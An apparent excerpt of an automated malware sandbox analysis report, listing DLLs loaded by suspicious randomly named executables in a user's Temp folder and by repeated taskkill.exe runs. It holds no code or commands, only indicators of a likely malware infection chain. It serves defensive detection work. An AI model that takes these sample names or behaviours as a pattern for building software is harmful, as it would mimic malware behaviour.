Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Section loaded: iphlpapi.dll
